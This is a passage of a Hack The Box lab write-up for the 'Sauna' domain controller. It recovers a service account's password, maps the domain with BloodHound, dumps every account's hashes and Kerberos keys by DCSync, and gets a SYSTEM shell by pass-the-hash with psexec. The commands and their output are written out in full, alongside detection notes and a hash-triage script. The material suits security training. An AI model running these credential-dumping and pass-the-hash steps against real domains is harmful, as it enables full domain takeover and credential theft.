winPEAS found autologon credentials. They live in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (the DefaultDomainName, DefaultUserName and DefaultPassword values) and that key is readable by every local user, so anyone with a shell can recover the cleartext password with reg query or Get-ItemProperty; storing an autologon password there on a domain controller is the real mistake.
u505@naos:~/HTB/Machines/Sauna$ crackmapexec smb 10.10.10.175/32 -u svc_loanmanager -p 'Moneymakestheworldgoround!'
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\svc_loanmanager:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
But these credentials fail: the autologon entry names svc_loanmanager and no such account exists in the domain (STATUS_LOGON_FAILURE is what SMB returns for a wrong password and for an unknown user alike). The RID brute-force did list svc_loanmgr, so we try the password against that account.
u505@naos:~/HTB/Machines/Sauna$ crackmapexec smb 10.10.10.175/32 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
And it works.
u505@naos:~/HTB/Machines/Sauna$ sudo crackmapexec smb 10.10.10.175/32 -u svc_loanmgr -p 'Moneymakestheworldgoround!' --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
SMB         10.10.10.175    445    SAUNA            [+] Enumerated shares
SMB         10.10.10.175    445    SAUNA            Share           Permissions     Remark
SMB         10.10.10.175    445    SAUNA            -----           -----------     ------
SMB         10.10.10.175    445    SAUNA            ADMIN$                          Remote Admin
SMB         10.10.10.175    445    SAUNA            C$                              Default share
SMB         10.10.10.175    445    SAUNA            IPC$            READ            Remote IPC
SMB         10.10.10.175    445    SAUNA            NETLOGON        READ            Logon server share
SMB         10.10.10.175    445    SAUNA            print$          READ            Printer Drivers
SMB         10.10.10.175    445    SAUNA            RICOH Aficio SP 8300DN PCL 6                 We cant print money
SMB         10.10.10.175    445    SAUNA            SYSVOL          READ            Logon server share
The shares are the same as for fsmith.
u505@naos:~/HTB/Machines/Sauna$ sudo crackmapexec winrm 10.10.10.175/32 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
WINRM       10.10.10.175    5985   SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA            [*] http://10.10.10.175:5985/wsman
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)
User svc_loanmgr has WinRM access too.
AD graph with bloodhound
First we start the graph database.
u505@naos:~/HTB/Machines/Sauna$ sudo neo4j console
[sudo] password for u505:
Directories in use:
  home:         /usr/share/neo4j
  config:       /usr/share/neo4j/conf
  logs:         /usr/share/neo4j/logs
  plugins:      /usr/share/neo4j/plugins
  import:       /usr/share/neo4j/import
  data:         /usr/share/neo4j/data
  certificates: /usr/share/neo4j/certificates
  run:          /usr/share/neo4j/run
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2020-12-29 20:13:40.458+0000 INFO  Starting...
2020-12-29 20:13:42.573+0000 INFO  ======== Neo4j 4.2.1 ========
2020-12-29 20:13:43.652+0000 INFO  Performing postInitialization step for component 'security-users' with version 2 and status CURRENT
2020-12-29 20:13:43.652+0000 INFO  Updating the initial password in component 'security-users'
2020-12-29 20:13:43.914+0000 INFO  Bolt enabled on localhost:7687.
2020-12-29 20:13:44.982+0000 INFO  Remote interface available at http://localhost:7474/
2020-12-29 20:13:44.983+0000 INFO  Started.
Start Bloodhound.
u505@naos:~/HTB/Machines/Sauna$ export DISPLAY=:10.0
u505@naos:~/HTB/Machines/Sauna$ /opt/utils/BloodHound/BloodHound-linux-x64/BloodHound
Copy the collector to the local directory.
u505@naos:~/HTB/Machines/Sauna$ cp /opt/utils/BloodHound/Collectors/SharpHound.exe ./
On the target, run the collector as fsmith and download the zip file it produces.
u505@naos:~/HTB/Machines/Sauna$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload SharpHound.exe Info: Uploading SharpHound.exe to C:\Users\FSmith\Documents\SharpHound.exe
Data: 1110696 bytes of 1110696 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\SharpHound.exe
------------------------------------------------
Initializing SharpHound at 7:46 PM on 12/29/2020
------------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain EGOTISTICAL-BANK.LOCAL using path CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 60 objects finished (+60 60)/s -- Using 27 MB RAM
Enumeration finished in 00:00:01.7950268
Compressing data to .\20201229194658_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 7:47 PM on 12/29/2020! Happy Graphing!
*Evil-WinRM* PS C:\Users\FSmith\Documents> download 20201229194658_BloodHound.zip Info: Downloading C:\Users\FSmith\Documents\20201229194658_BloodHound.zip to 20201229194658_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> exit
Info: Exiting with code 0
Ingest the zip file in the BloodHound UI.
Mark user fsmith as owned.
Mark user svc_loanmgr as owned.
Administrator is the only admin in this domain.
The graph shows that svc_loanmgr has DCSync rights on the domain object: the GetChanges and GetChangesAll edges, i.e. the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights. Holding both lets us pose as a domain controller over the DRSUAPI replication interface and ask the real DC to replicate every account's secrets to us, krbtgt and Administrator included. Only domain controllers replicate legitimately, so a Security event 4662 carrying the GUIDs of those two rights (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) for an account that is not a DC is a high-confidence detection.
The graph also flags fsmith as AS-REP roastable (dontreqpreauth set), the weakness we already exploited.
Dump hashes by DCSync
u505@naos:~/HTB/Machines/Sauna$ python3 /opt/utils/impacket/examples/secretsdump.py svc_loanmgr@sauna
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:b237f48bc404863ca6d2c62750e403df:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:3a43b214a77e807f18cf726cc35d2a760dcf2e5b1095ca976d1d5c537704d6bd
SAUNA$:aes128-cts-hmac-sha1-96:cd9b1858751d4d9d718136ad1a37d0e6
SAUNA$:des-cbc-md5:7ad9bc541af40d73
[*] Cleaning up...
The "RemoteOperations failed ... rpc_s_access_denied" line is expected: svc_loanmgr is not a local administrator, so secretsdump cannot read the registry hives or NTDS.DIT over SMB and falls back to the DRSUAPI method, which is pure DCSync and needs only the replication rights. Three things stand out in the dump. The aad3b435... LM half on every line is the LM hash of an empty password, meaning LM storage is disabled; Guest's NT hash 31d6cfe0... is the empty password; and HSmith and FSmith share the NT hash 58a52d36..., so HSmith's password is Thestrokes23 as well.
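A small triage of the DCSync output, as an added example that is not part of the original writeup: it parses secretsdump's domain\uid:rid:lmhash:nthash::: lines and reports empty passwords, accounts that still store a real LM hash, machine accounts, and accounts that share an NT hash (NT hashes are unsalted, so a shared hash is a shared password). The embedded input is copied from the dump above; the function names are mine.

```python
"""Triage of a secretsdump.py NTDS dump: empty passwords, stored LM hashes and
NT-hash reuse between accounts. Added example (not from the original writeup),
run over the hash lines the DCSync above returned; the helper names are mine."""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": the account has no password

# secretsdump's "domain\uid:rid:lmhash:nthash:::" lines; status and Kerberos-key lines never match.
DUMP_LINE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I)

# Copied from the DCSync output above (one Kerberos-key line kept to show it is skipped).
SAUNA_DUMP = r"""
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:b237f48bc404863ca6d2c62750e403df:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
"""


def parse_dump(text):
    """Yield (sAMAccountName, rid, lmhash, nthash); the domain prefix is dropped."""
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if m:
            yield m["user"].rsplit("\\", 1)[-1], int(m["rid"]), m["lm"].lower(), m["nt"].lower()


def triage(text):
    """Group the dump into the findings a reviewer would report from an NTDS extract."""
    report = {"empty_password": [], "lm_stored": [], "machine_accounts": [], "shared_nt": {}}
    by_nt = defaultdict(list)
    for user, rid, lm, nt in parse_dump(text):
        if user.endswith("$"):
            report["machine_accounts"].append(user)
        if nt == EMPTY_NT:
            report["empty_password"].append(user)
        if lm != EMPTY_LM:  # a real LM hash: 14 case-folded chars in two halves, crackable in minutes
            report["lm_stored"].append(user)
        by_nt[nt].append(user)
    # Same NT hash means same password; the empty hash is reported separately above.
    report["shared_nt"] = {nt: users for nt, users in by_nt.items() if len(users) > 1 and nt != EMPTY_NT}
    return report


if __name__ == "__main__":
    for key, value in triage(SAUNA_DUMP).items():
        print(f"{key:17s} {value}")
```

On this dump the interesting line is shared_nt: HSmith and FSmith resolve to the same hash, so cracking one AS-REP gave away two accounts. The same parser works on the output of secretsdump -just-dc-ntlm or on a local NTDS.DIT extraction, which is how you would run it against a real domain during an assessment or a password audit.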
Root flag
psexec.py authenticates with the Administrator NT hash straight from the dump (pass-the-hash; the aad3b435... LM half is only a placeholder) and gets a SYSTEM shell by writing a random-named binary to ADMIN$ and registering it as a service (FbDzpflW.exe and service WAwA below). That is the noisy option: it leaves a new file on the DC and a service-installed event (7045 in the System log, 4697 in Security if auditing is on). wmiexec.py or evil-winrm -H with the same hash would get the same access with less on disk.
u505@naos:~/HTB/Machines/Sauna$ python3 /opt/utils/impacket/examples/psexec.py administrator@sauna -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on sauna.....
[*] Found writable share ADMIN$
[*] Uploading file FbDzpflW.exe
[*] Opening SVCManager on sauna.....
[*] Creating service WAwA on sauna.....
[*] Starting service WAwA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\Users
c:\Users>cd administrator
c:\Users\Administrator>cd Desktop
c:\Users\Administrator\Desktop>type root.txt
<ROOT_FLAG>
c:\Users\Administrator\Desktop>systeminfo
Host Name:                 SAUNA
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00429-00000-00001-AA815
Original Install Date:     1/22/2020, 9:32:10 PM
System Boot Time:          12/28/2020, 4:20:33 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,884 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,757 MB
Virtual Memory: In Use:    1,042 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    EGOTISTICAL-BANK.LOCAL
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: KB4532947
                           [02]: KB4462930
                           [03]: KB4516115
                           [04]: KB4523204
                           [05]: KB4534273
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.175
                                 [02]: fe80::792e:7029:e1dd:c810
                                 [03]: dead:beef::792e:7029:e1dd:c810
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

c:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on sauna.....
[*] Stopping service WAwA.....
[*] Removing service WAwA.....
[*] Removing file FbDzpflW.exe.....
Daniel Simao 20:22, 28 December 2020 (EST)